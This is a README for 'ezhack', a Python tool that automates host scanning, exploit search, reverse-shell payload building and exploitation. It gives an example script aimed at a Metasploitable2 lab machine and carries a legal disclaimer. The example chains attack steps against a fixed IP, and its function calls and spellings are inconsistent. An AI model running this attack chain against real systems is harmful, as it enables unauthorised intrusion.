Running the same commands can be boring. Why not keep things simple?
This tool is to be used on Kali Linux with only default tools installed (latest version as of March 2019). ParrotOS is what I use and if you have never tried it then I recommend you do! The guide will reference both as Kali for simplicity. https://www.parrotsec.org/
For this project you need Python3.* which comes installed on Kali by default. To get the module run:
git clone https://github.com/burtonyaboy/ezhack.git
Then:
cd ezhack
note: all the necessary python modules should be installed, however, if you run into problems, run pip3 install -r requirements.txt
In the future, I may write a setup.py, but for now just build your project in the ezhack directory.
To use ezhack import it to your project:
import ezhack as ez
The functions include scan_for_hosts, scan_target, build_payload, search_for_exploits, exlpoit_target, drop_payload and handle_host. The data is returned to a Host object provided by ezhack, otherwise in json format, with the addition af a scan.xml file generated by nmap for used with searchsploit. Below is an example of a script that attacks a Metasploitable2.
SERIOUS DISCLAIMER: DO NOT TARGET A NETWORK OR HOST IF YOU DO NOT OWN IT OR DO NOT HAVE EXPLICIT WRITTEN PERMISSION TO DO SO. THE AUTOMATED NATURE OF THIS TOOL MEANS THAT THESE ATTACKS ARE EASY TO DETECT AND ARE WELL KNOWN. IF YOU USE ANY OF THESE TOOLS IN AN ILLEGAL MANNER YOU WILL BE DISCOVERED AND LEGAL ACTION MAY BE TAKEN INCLUDING FINES, COURT MANDATED RESTRICTIONS OR JAILTIME. IF YOU HAVE ANY QUESTION THAT YOU SHOULD NOT BE ATTACKING A NETWORK OR HOST, STOP NOW. I CLAIM NO RESPONSIBILITY FOR HOW YOU DECIDE TO USE THIS TOOL WHICH IS BUILT PURELY FOR EDUCATIONAL AND RESEARCH PURPOSES. If you have any questions or interest in the penalties for cybercrime, check out these links: US penalties: https://www.cga.ct.gov/2012/rpt/2012-r-0254.htm State penalties: http://www.ncsl.org/research/telecommunications-and-information-technology/computer-hacking-and-unauthorized-access-laws.aspx
import ezhack as ez
host = ez.Host(ip="192.168.1.3")
def main():
scan_target(host) # default is aggressive scan
search_for_exploits(host)
payload = build_payload(host) # default is reverse shell
session = exploit_target(host)
drop_payload(payload,session)
priv = handle_host(cmd="id")
print(priv)
if __name__ == '__main__':
main()
This project is still in development. More documentation and functionality will come soon.